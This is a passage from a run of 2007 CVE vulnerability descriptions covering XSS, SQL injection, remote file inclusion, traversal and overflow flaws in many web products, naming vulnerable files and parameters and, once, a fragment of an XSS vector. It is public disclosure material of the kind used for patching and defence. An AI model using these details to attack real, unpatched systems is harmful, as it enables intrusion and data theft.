S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties. [CVE-2007-1490] Unspecified maintenance web pages in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allow remote authenticated users to execute arbitrary commands via shell metacharacters in unspecified vectors (aka "shell command injection"). [CVE-2007-1489] Unspecified vulnerability in web-app.org Web Automated Perl Portal (WebAPP) 0.9.9.4 to 0.9.9.6 allows remote attackers to obtain admin access by modifying cookies and performing "certain consecutive actions," possibly due to a cross-site request forgery (CSRF) vulnerability. [CVE-2007-1488] Unspecified vulnerability in Sun Java System Web Server 6.0 and 6.1 before 20070315 allows remote attackers to "gain unauthorized access to data", possibly involving a sample application. [CVE-2007-1487] Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action. [CVE-2007-1483] Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php. [CVE-2007-1482] Cross-site scripting (XSS) vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the e_id parameter in a viewentry cmd. [CVE-2007-1479] Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter. [CVE-2007-1473] Cross-site scripting (XSS) vulnerability in framework/NLS/NLS.php in Horde Framework before 3.1.4 RC1, when the login page contains a language selection box, allows remote attackers to inject arbitrary web script or HTML via the new_lang parameter to login.php. [CVE-2007-1468] Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest (CQ) Web 7.0.0.0 allows remote attackers to inject arbitrary web script or HTML via an attachment to a defect log entry. [CVE-2007-1467] Multiple cross-site scripting (XSS) vulnerabilities in (1) PreSearch.html and (2) PreSearch.class in Cisco Secure Access Control Server (ACS), VPN Client, Unified Personal Communicator, MeetingPlace, Unified MeetingPlace, Unified MeetingPlace Express, CallManager, IP Communicator, Unified Video Advantage, Unified Videoconferencing 35xx products, Unified Videoconferencing Manager, WAN Manager, Security Device Manager, Network Analysis Module (NAM), CiscoWorks and related products, Wireless LAN Solution Engine (WLSE), 2006 Wireless LAN Controllers (WLC), and Wireless Control System (WCS) allow remote attackers to inject arbitrary web script or HTML via the text field of the search form. [CVE-2007-1462] The luci server component in conga preserves the password between page loads for the Add System/Cluster task flow by storing the password in the Value attribute of a password entry field, which allows attackers to steal the password by performing a "view source" or other operation to obtain the web page. NOTE: there are limited circumstances under which such an attack is feasible. [CVE-2007-1459] Multiple PHP remote file inclusion vulnerabilities in WebCreator 0.2.6-rc3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the moddir parameter to (1) content/load.inc.php, (2) config/load.inc.php, (3) http/load.inc.php, and unspecified other files. [CVE-2007-1452] The FDF support (ext/fdf) in PHP 5.2.0 and earlier does not implement the input filtering hooks for ext/filter, which allows remote attackers to bypass web site filters via an application/vnd.fdf formatted POST. [CVE-2007-1448] The Tape Engine in CA (formerly Computer Associates) BrightStor ARCserve Backup 11.5 and earlier allows remote attackers to cause a denial of service (disabled interface) by calling an unspecified RPC function. [CVE-2007-1443] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Woltlab Burning Board (wBB) 2.3.6 and Burning Board Lite 1.0.2pl3e allow remote attackers to inject arbitrary web script or HTML via the (1) r_username, (2) r_email, (3) r_password, (4) r_confirmpassword, (5) r_homepage, (6) r_icq, (7) r_aim, (8) r_yim, (9) r_msn, (10) r_year, (11) r_month, (12) r_day, (13) r_gender, (14) r_signature, (15) r_usertext, (16) r_invisible, (17) r_usecookies, (18) r_admincanemail, (19) r_emailnotify, (20) r_notificationperpm, (21) r_receivepm, (22) r_emailonpm, (23) r_pmpopup, (24) r_showsignatures, (25) r_showavatars, (26) r_showimages, (27) r_daysprune, (28) r_umaxposts, (29) r_dateformat, (30) r_timeformat, (31) r_startweek, (32) r_timezoneoffset, (33) r_usewysiwyg, (34) r_styleid, (35) r_langid, (36) key_string, (37) key_number, (38) disablesmilies, (39) disablebbcode, (40) disableimages, (41) field[1], (42) field[2], and (43) field[3] parameters. NOTE: a third-party researcher has disputed some of these vectors, stating that only the r_dateformat and r_timeformat parameters in Burning Board 2.3.6 are affected. [CVE-2007-1433] Cross-site scripting (XSS) vulnerability in Grayscale Blog 0.8.0, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the comment fields to (1) scripts/addblog_comment.php and (2) detail.php. [CVE-2007-1418] Cross-site scripting (XSS) vulnerability in skins/ace/popup-notopic.php in MindTouch OpenGarden DekiWiki before Gooseberry++ allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2007-1405] Cross-site scripting (XSS) vulnerability in the "download wiki page as text" feature in Trac before 0.10.3.1, when Microsoft Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2007-1391] PHP remote file inclusion vulnerability in modules/abook/foldertree.php in Leo West WEBO (aka weborganizer) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter. [CVE-2007-1390] Multiple cross-site scripting (XSS) vulnerabilities in dynaliens 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) recherche.php3 or (2) ajouter.php3. [CVE-2007-1374] Cross-site scripting (XSS) vulnerability in pop_profile.asp in Snitz Forums 2000 3.4.06 allows remote attackers to inject arbitrary web script or HTML via the MSN parameter. NOTE: the provenance of this information is unknown [CVE-2007-1367] Cross-site scripting (XSS) vulnerability in the login page in Avaya Communications Manager (CM) S87XX, S8500, and S8300 products before 3.1.3 allows remote attackers to inject arbitrary web script or HTML via the Login field. [CVE-2007-1361] Cross-site scripting (XSS) vulnerability in virtuemart_parser.php in VirtueMart before 20070213 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue is probably different than CVE-2007-0376. [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616". [CVE-2007-1355] Multiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors. [CVE-2007-1350] Stack-based buffer overflow in webadmin.exe in Novell NetMail 3.5.2 allows remote attackers to execute arbitrary code via a long username during HTTP Basic authentication. [CVE-2007-1345] Unspecified vulnerability in cube.exe in the GINA component for CA (Computer Associates) eTrust Admin 8.1.0 through 8.1.2 allows attackers with physical interactive or Remote Desktop access to bypass authentication and gain privileges via the password reset interface. [CVE-2007-1343] includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that probably include remote file inclusion and other issues. [CVE-2007-1342] Cross-site scripting (XSS) vulnerability in admincp/index.php in Jelsoft vBulletin 3.6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the add rss url form. [CVE-2007-1331] Multiple cross-site scripting (XSS) vulnerabilities in TKS Banking Solutions ePortfolio 1.0 Java allow remote attackers to inject arbitrary web script or HTML via unspecified vectors that bypass the client-side protection scheme, one of which may be the q parameter to the search program. NOTE: some of these details are obtained from third party information. [CVE-2007-1328] Cross-site scripting (XSS) vulnerability in formulaire.php in Bernard JOLY BJ Webring allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter related to the add link menu. [CVE-2007-1325] The PMA_ArrayWalkRecursive function in libraries/common.lib.php in phpMyAdmin before 2.10.0.2 does not limit recursion on arrays provided by users, which allows context-dependent attackers to cause a denial of service (web server crash) via an array with many dimensions. NOTE: it could be argued that this vulnerability is caused by a problem in PHP (CVE-2006-1549) and the proper fix should be in PHP [CVE-2007-1319] Unspecified vulnerability in the IOPCServer::RemoveGroup function in the OPCDA interface in Takebishi Electric DeviceXPlorer OLE for Process Control (OPC) Server before 3.12 Build3 allows remote attackers to execute arbitrary code via unspecified vectors involving access to arbitrary memory. NOTE: this issue affects the (1) HIDIC, (2) MELSEC, (3) FA-M3, (4) MODBUS, and (5) SYSMAC OPC Servers. [CVE-2007-1305] Multiple cross-site scripting (XSS) vulnerabilities in add2.php in Sava's Guestbook 23.11.2006 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) country, (3) email, and (4) website parameters. [CVE-2007-1304] Multiple SQL injection vulnerabilities in add2.php in Sava's Guestbook 23.11.2006, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) country, (3) email, (4) website, and (5) message parameters. [CVE-2007-1300] DOURAN Software Technologies ISPUtil 3.32.84.1, and possibly earlier versions, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user and reseller data via a direct request for scripts/activesessions.ini. NOTE: the provenance of this information is unknown [CVE-2007-1294] A certain ActiveX control in the DivXBrowserPlugin (npdivx32.dll) in DivX Web Player, as distributed with DivX Player 1.3.0, allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via large values to DivxWP.Resize, related to resizing images. [CVE-2007-1291] Multiple cross-site scripting (XSS) vulnerabilities in Tyger Bug Tracking System (TygerBT) 1.1.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) Login.php and (2) Register.php. [CVE-2007-1288] Multiple PHP remote file inclusion vulnerabilities in Webmobo WB News 1.4.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the config[installdir] parameter to (1) comment.php, (2) themes.php, (3) directory.php, and (4) sendmsg.php in admin/. [CVE-2007-1280] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp X5, 6, and Server 6 allows remote attackers to inject arbitrary web script or HTML via a URL after a # (hash) in the URL path, as demonstrated using en/frameset-7.html, and possibly other unspecified vectors involving templates and (1) whstart.js and (2) whcsh_home.htm in WebHelp, (3) wf_startpage.js and (4) wf_startqs.htm in FlashHelp, or (5) WindowManager.dll in RoboHelp Server 6. [CVE-2007-1278] Unspecified vulnerability in the IIS connector in Adobe JRun 4.0 Updater 6, and ColdFusion MX 6.1 and 7.0 Enterprise, when using Microsoft IIS 6, allows remote attackers to cause a denial of service via unspecified vectors, involving the request of a file in the JRun web root. [CVE-2007-1276] Multiple cross-site scripting (XSS) vulnerabilities in chooser.cgi in Webmin before 1.330 and Usermin before 1.260 allow remote attackers to inject arbitrary web script or HTML via a crafted filename. [CVE-2007-1262] Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. [CVE-2007-1260] Stack-based buffer overflow in the connectHandle function in server.cpp in WebMod 0.48 allows remote attackers to execute arbitrary code via a long string in the Content-Length HTTP header. [CVE-2007-1259] Multiple unspecified vulnerabilities in WebAPP before 0.9.9.6 have unknown impact and attack vectors. [CVE-2007-1256] Mozilla Firefox 2.0.0.2 allows remote attackers to spoof the address bar, favicons, and document source, and perform updates in the context of arbitrary websites, by repeatedly setting document.location in the onunload attribute when linking to another website, a variant of CVE-2007-1092. [CVE-2007-1248] Multiple cross-site scripting (XSS) vulnerabilities in built2go News Manager Blog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cid, (2) uid, and (3) nid parameters to (a) news.php, and the nid parameter to (b) rating.php. [CVE-2007-1247] Multiple PHP remote file inclusion vulnerabilities in aWeb Labs aWebNews 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the path_to_news parameter to (1) listing.php or (2) visview.php. [CVE-2007-1241] Cross-site scripting (XSS) vulnerability in setup.php in Audins Audiens 3.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. NOTE: the provenance of this information is unknown [CVE-2007-1240] Multiple cross-site scripting (XSS) vulnerabilities in Docebo CMS 3.0.3 through 3.0.5 allow remote attackers to inject arbitrary web script or HTML via (1) the searchkey parameter to index.php, or the (2) sn or (3) ri parameter to modules/htmlframechat/index.php. NOTE: the provenance of this information is unknown [CVE-2007-1234] Multiple cross-site scripting (XSS) vulnerabilities in sitex allow remote attackers to inject arbitrary web script or HTML via (1) the sxYear parameter to calendar.php, (2) the search parameter to search.php, (3) the linkid parameter to redirect.php, or (4) the page parameter to calendar_events.php. [CVE-2007-1231] Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) database name, (2) table name, (3) ViewName, (4) view, (5) trigger, and (6) function fields in main.php and certain other files. [CVE-2007-1230] Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability." [CVE-2007-1198] Cross-site scripting (XSS) vulnerability in TaskFreak! before 0.5.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly a variant of CVE-2007-0982. [CVE-2007-1196] Unspecified vulnerability in Citrix Presentation Server Client for Windows before 10.0 allows remote web sites to execute arbitrary code via unspecified vectors, related to the implementation of ICA connectivity through proxy servers. [CVE-2007-1192] Thomas R. Pasawicz HyperBook Guestbook 1.30 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an admin password hash via a direct request for data/gbconfiguration.dat. [CVE-2007-1190] Unspecified vulnerability in the EmbeddedWB Web Browser ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2007-1188] WebAPP before 0.9.9.5 allows remote attackers to submit Search form input that is not checked for (1) composition or (2) length, which has unknown impact, possibly related to "search form hijacking". [CVE-2007-1187] WebAPP before 0.9.9.5 allows remote authenticated users, without admin privileges, to obtain sensitive information via (1) the Forum Archive feature and (2) Recent Searches. [CVE-2007-1186] WebAPP before 0.9.9.5 does not "censor" the Latest Member real name, which has unknown impact. [CVE-2007-1185] The (1) Search, (2) Edit Profile, (3) Recommend, and (4) User Approval forms in WebAPP before 0.9.9.5 use hidden inputs, which has unknown impact and remote attack vectors. [CVE-2007-1184] The default configuration of WebAPP before 0.9.9.5 has a CAPTCHA setting of "no," which makes it easier for automated programs to submit false data. [CVE-2007-1183] WebAPP before 0.9.9.5 allows remote authenticated users to spoof another user's Real Name via whitespace, which has unknown impact and attack vectors. [CVE-2007-1182] WebAPP before 0.9.9.5 allows remote Guest users to edit a Guest profile, which has unknown impact. [CVE-2007-1181] WebAPP before 0.9.9.5 passes (1) Unused Informations and (2) the username through Edit Profile forms, which has unknown impact and attack vectors. [CVE-2007-1180] WebAPP before 0.9.9.5 does not check referrers in certain forms, which might facilitate remote cross-site request forgery (CSRF) attacks or have other unknown impact. [CVE-2007-1179] WebAPP before 0.9.9.5 does not properly manage e-mail addresses in certain contexts related to (1) the Recommend feature, Email Article (2) senders and (3) recipients, (4) New User Approval, (5) Edit Profiles, (6) the Newsletter Subscription form, (7) the Recommend form, and (8) sending of articles, which has unknown impact, and remote attack vectors related to spam attacks and possibly other attacks. [CVE-2007-1178] WebAPP before 0.9.9.5 does not check access in certain contexts related to (1) Calendar Administration, (2) Instant Messages Administration, and (3) the Image Uploader, which has unknown impact and attack vectors. [CVE-2007-1177] WebAPP before 0.9.9.5 does not properly filter certain characters in contexts related to (1) the query string, (2) Profiles, (3) the Forum Post icon field, (4) the Edit Profile, and (5) the Gallery, which has unknown impact and remote attack vectors, possibly related to cross-site scripting (XSS). [CVE-2007-1176] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP before 0.9.9.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) Gallery Comments pages, (2) Feedback pages, (3) Search Results pages, and (4) the Statistics Log viewer. [CVE-2007-1175] Cross-site scripting (XSS) vulnerability in an admin feature in WebAPP before 20070209 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-1174] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP before 20070214 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to unspecified fields in user Profiles. NOTE: some of these details are obtained from third party information. [CVE-2007-1163] SQL injection vulnerability in printview.php in webSPELL 4.01.02 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter, a different vector than CVE-2007-1019, CVE-2006-5388, and CVE-2006-4783. [CVE-2007-1161] Cross-site scripting (XSS) vulnerability in call_entry.php in Call Center Software 0,93 allows remote attackers to inject arbitrary web script or HTML via the problem_desc parameter, as demonstrated by the ONLOAD attribute of a BODY element. [CVE-2007-1160] webSPELL 4.0, and possibly later versions, allows remote attackers to bypass authentication via a ws_auth cookie, a different vulnerability than CVE-2006-4782. [CVE-2007-1159] Cross-site scripting (XSS) vulnerability in modules/out.php in Pyrophobia 2.1.3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown [CVE-2007-1155] Unrestricted file upload vulnerability in webSPELL allows remote authenticated administrators to upload and execute arbitrary PHP code via the add squad feature. NOTE: this issue may be an administrative feature, in which case this CVE may be REJECTED. [CVE-2007-1154] SQL injection vulnerability in webSPELL allows remote attackers to execute arbitrary SQL commands via a ws_auth cookie, a different vulnerability than CVE-2006-4782. [CVE-2007-1151] Cross-site scripting (XSS) vulnerability in LoveCMS 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter to the top-level URI, possibly related to a SQL error. [CVE-2007-1145] Multiple cross-site scripting (XSS) vulnerabilities in Kayako SupportSuite - ESupport 3.00.13 and 3.04.10 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a (1) lostpassword or (2) register action in index.php, (3) unspecified vectors in the Submit form in a submit action in index.php, and (4) the user's name in index.php [CVE-2007-1144] Directory traversal vulnerability in jwpn-photos.php in J-Web Pics Navigator 2.0 allows remote attackers to list arbitrary directories via a .. (dot dot) in the dir parameter. [CVE-2007-1143] Directory traversal vulnerability in pn-menu.php in J-Web Pics Navigator 1.0 allows remote attackers to list arbitrary directories via a .. (dot dot) in the dir parameter. [CVE-2007-1142] Cross-site scripting (XSS) vulnerability in Magic News Plus 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the link_parameters parameter in (1) news.php and (2) n_layouts.php. [CVE-2007-1136] index.php in WebMplayer before 0.6.1-Alpha allows remote attackers to execute arbitrary code via shell metacharacters in an exec function call. NOTE: some sources have referred to this as eval injection in the param parameter, but CVE source inspection suggests that this is erroneous. [CVE-2007-1135] Multiple SQL injection vulnerabilities in WebMplayer before 0.6.1-Alpha allow remote attackers to execute arbitrary SQL commands via the (1) strid parameter to index.php and the (2) id[0] or other id array index parameter to filecheck.php. [CVE-2007-1132] Multiple cross-site scripting (XSS) vulnerabilities in the "Contact Us" functionality in MTCMS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) message and (2) title fields. [CVE-2007-1125] Cross-site scripting (XSS) vulnerability in gallery.php in XeroXer Simple one-file gallery allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2007-1111] Multiple cross-site scripting (XSS) vulnerabilities in ActiveCalendar 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the css parameter to (1) flatevents.php, (2) js.php, (3) mysqlevents.php, (4) m_2.php, (5) m_3.php, (6) m_4.php, (7) xmlevents.php, (8) y_2.php, or (9) y_3.php in data/. [CVE-2007-1109] Multiple cross-site scripting (XSS) vulnerabilities in Phpwebgallery 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) login or (2) mail_address field in Register.php, or the (3) search_author, (4) mode, (5) start_year, (6) end_year, or (7) date_type field in Search.php, a different vulnerability than CVE-2006-1674. NOTE: 1.6.2 and other versions might also be affected. [CVE-2007-1101] Multiple cross-site scripting (XSS) vulnerabilities in Photostand 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) message ("comment") or (2) name field, or the (3) q parameter in a search action in index.php. [CVE-2007-1096] Cross-site scripting (XSS) vulnerability in ps_cart.php in VirtueMart before 20070116 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue might overlap CVE-2007-0376. [CVE-2007-1095] Mozilla Firefox before 2.0.0.8 and SeaMonkey before 1.1.5 do not properly implement JavaScript onUnload handlers, which allows remote attackers to run certain JavaScript code and access the location DOM hierarchy in the context of the next web site that is visited by a client. [CVE-2007-1093] Multiple unspecified vulnerabilities in JP1/Cm2/Network Node Manager (NNM) before 07-10-05, and before 08-00-02 in the 08-x series, allow remote attackers to execute arbitrary code, cause a denial of service, or trigger invalid Web utility behavior. [CVE-2007-1085] Cross-site scripting (XSS) vulnerability in Google Desktop allows remote attackers to bypass protection schemes and inject arbitrary web script or HTML, and possibly gain full access to the system, by using an XSS vulnerability in google.com to extract the signature for the internal web server, then calling the "under" parameter in Advanced Search with the proper signature. [CVE-2007-1084] Mozilla Firefox 2.0.0.1 and earlier does not prompt users before saving bookmarklets, which allows remote attackers to bypass the same-domain policy by tricking a user into saving a bookmarklet with a data: scheme, which is executed in the context of the last visited web page. [CVE-2007-1072] The command line interface (CLI) in Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G, and 7971G, with firmware 8.0(4)SR1 and earlier allows local users to obtain privileges or cause a denial of service via unspecified vectors. NOTE: this issue can be leveraged remotely via CVE-2007-1063. [CVE-2007-1062] The Cisco Unified IP Conference Station 7935 3.2(15) and earlier, and Station 7936 3.3(12) and earlier does not properly handle administrator HTTP sessions, which allows remote attackers to bypass authentication controls via a direct URL request to the administrative HTTP interface for a limited time [CVE-2007-1058] SQL injection vulnerability in user_pages/page.asp in Online Web Building 2.0 allows remote attackers to execute arbitrary SQL commands via the art_id parameter. [CVE-2007-1055] Cross-site scripting (XSS) vulnerability in the AJAX features in index.php in MediaWiki 1.9.x before 1.9.0rc2, and 1.8.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the rs parameter. NOTE: this issue might be a duplicate of CVE-2007-0177. [CVE-2007-1054] Cross-site scripting (XSS) vulnerability in the AJAX features in index.php in MediaWiki 1.6.x through 1.9.2, when $wgUseAjax is enabled, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded value of the rs parameter, which is processed by Internet Explorer. [CVE-2007-1050] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AbleDesign MyCalendar allow remote attackers to inject arbitrary web script or HTML via (1) the go parameter, (2) the keyword parameter in the search menu (go=search), or (3) the username or (4) the password in a go=Login action. [CVE-2007-1049] Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable. [CVE-2007-1043] Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to (1) update.php and (2) config.php. [CVE-2007-1028] Cross-site scripting (XSS) vulnerability in the Barry Jaspan Image Pager 4.7.x-1.x-dev and 5.x-1.x-dev before 2007-02-08 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to HTML entities and the IMG element. [CVE-2007-1020] Cross-site scripting (XSS) vulnerability in index.php in CedStat 1.31 allows remote attackers to inject arbitrary web script or HTML via the hier parameter. [CVE-2007-1019] SQL injection vulnerability in news.php in webSPELL 4.01.02, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands via the showonly parameter to index.php, a different vector than CVE-2006-5388. [CVE-2007-1012] Cross-site scripting (XSS) vulnerability in faq.php in DeskPRO 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the article parameter. [CVE-2007-0982] Cross-site scripting (XSS) vulnerability in error.php in TaskFreak! 0.5.5 allows remote attackers to inject arbitrary web script or HTML via the tznMessage parameter. NOTE: the provenance of this information is unknown [CVE-2007-0977] IBM Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores HTTPPassword hashes from names.nsf in a manner accessible through Readviewentries and OpenDocument requests to the defaultview view, a different vector than CVE-2005-2428. [CVE-2007-0973] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Jupiter CMS 1.1.5 allow remote attackers to inject arbitrary web script or HTML via the Referer HTTP header and certain other HTTP headers, which are displayed without proper sanitization when an administrator performs a Logged Guest action. [CVE-2007-0970] Multiple SQL injection vulnerabilities in WebTester 5.0.20060927 and earlier allow remote attackers to execute arbitrary SQL commands via the testID parameter to directions.php, and unspecified parameters to other files that accept GET or POST input. [CVE-2007-0969] Multiple cross-site scripting (XSS) vulnerabilities in WebTester 5.0.20060927 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to POST parameters to multiple files. [CVE-2007-0953] Cross-site scripting (XSS) vulnerability in search.pl in @Mail 4.61 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2007-0952] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Virtual Calendar allow remote attackers to inject arbitrary web script or HTML via the (1) t and (2) yr parameters, and the (3) sho parameter when the m parameter is outside the intended range. [CVE-2007-0950] Cross-site scripting (XSS) vulnerability in listmain.asp in Fullaspsite ASP Hosting Site allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability." [CVE-2007-0932] The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN. [CVE-2007-0931] Heap-based buffer overflow in the management interfaces in (1) Aruba Mobility Controllers 200, 800, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via long credential strings. [CVE-2007-0928] Virtual Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an encoded password via a direct request for pwd.txt. [CVE-2007-0925] Cross-site scripting (XSS) vulnerability in search/SearchResults.aspx in Community Server allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2007-0922] Cross-site scripting (XSS) vulnerability in buscador/buscador.htm in Portal Search allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2007-0921] Portal Search allows remote attackers to redirect a URL to an arbitrary web site by placing the URL in the query string to the top-level URI. [CVE-2007-0919] Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI. [CVE-2007-0901] Multiple cross-site scripting (XSS) vulnerabilities in Info pages in MoinMoin 1.5.7 allow remote attackers to inject arbitrary web script or HTML via the (1) hitcounts and (2) general parameters, different vectors than CVE-2007-0857. NOTE: the provenance of this information is unknown [CVE-2007-0896] Cross-site scripting (XSS) vulnerability in the (1) Sage before 1.3.10, and (2) Sage++ extensions for Firefox, allows remote attackers to inject arbitrary web script or HTML via a "<SCRIPT/=''SRC='" sequence in an RSS feed, a different vulnerability than CVE-2006-4712. [CVE-2007-0891] Cross-site scripting (XSS) vulnerability in the GetCurrentCompletePath function in phpmyvisites.php in phpMyVisites before 2.2 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2007-0890] Cross-site scripting (XSS) vulnerability in scripts/passwdmysql in cPanel WebHost Manager (WHM) 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter. [CVE-2007-0885] Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-0880] Capital Request Forms stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request for inc/common_db.inc. [CVE-2007-0876] Cross-site scripting (XSS) vulnerability in Quick Digital Image Gallery (Qdig) 1.2.9.3 and devel-20060624 allows remote attackers to inject arbitrary web script or HTML via the Qwd parameter to the top-level URI. [CVE-2007-0872] Directory traversal vulnerability in the Plain Old Webserver (POW) add-on before 0.0.9 for Mozilla Firefox allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2007-0869] Cross-site scripting (XSS) vulnerability in the Attachment Manager (admincp/attachment.php) in Jelsoft vBulletin 3.6.4 allows remote attackers to inject arbitrary web script or HTML via the Extension field. NOTE: this might be a duplicate of CVE-2007-0830.5. NOTE: the provenance of this information is unknown [CVE-2007-0857] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin before 1.5.7 allow remote attackers to inject arbitrary web script or HTML via (1) the page info, or the page name in a (2) AttachFile, (3) RenamePage, or (4) LocalSiteMap action. [CVE-2007-0856] TmComm.sys 1.5.0.1052 in the Trend Micro Anti-Rootkit Common Module (RCM), with the VsapiNI.sys 3.320.0.1003 scan engine, as used in Trend Micro PC-cillin Internet Security 2007, Antivirus 2007, Anti-Spyware for SMB 3.2 SP1, Anti-Spyware for Consumer 3.5, Anti-Spyware for Enterprise 3.0 SP2, Client / Server / 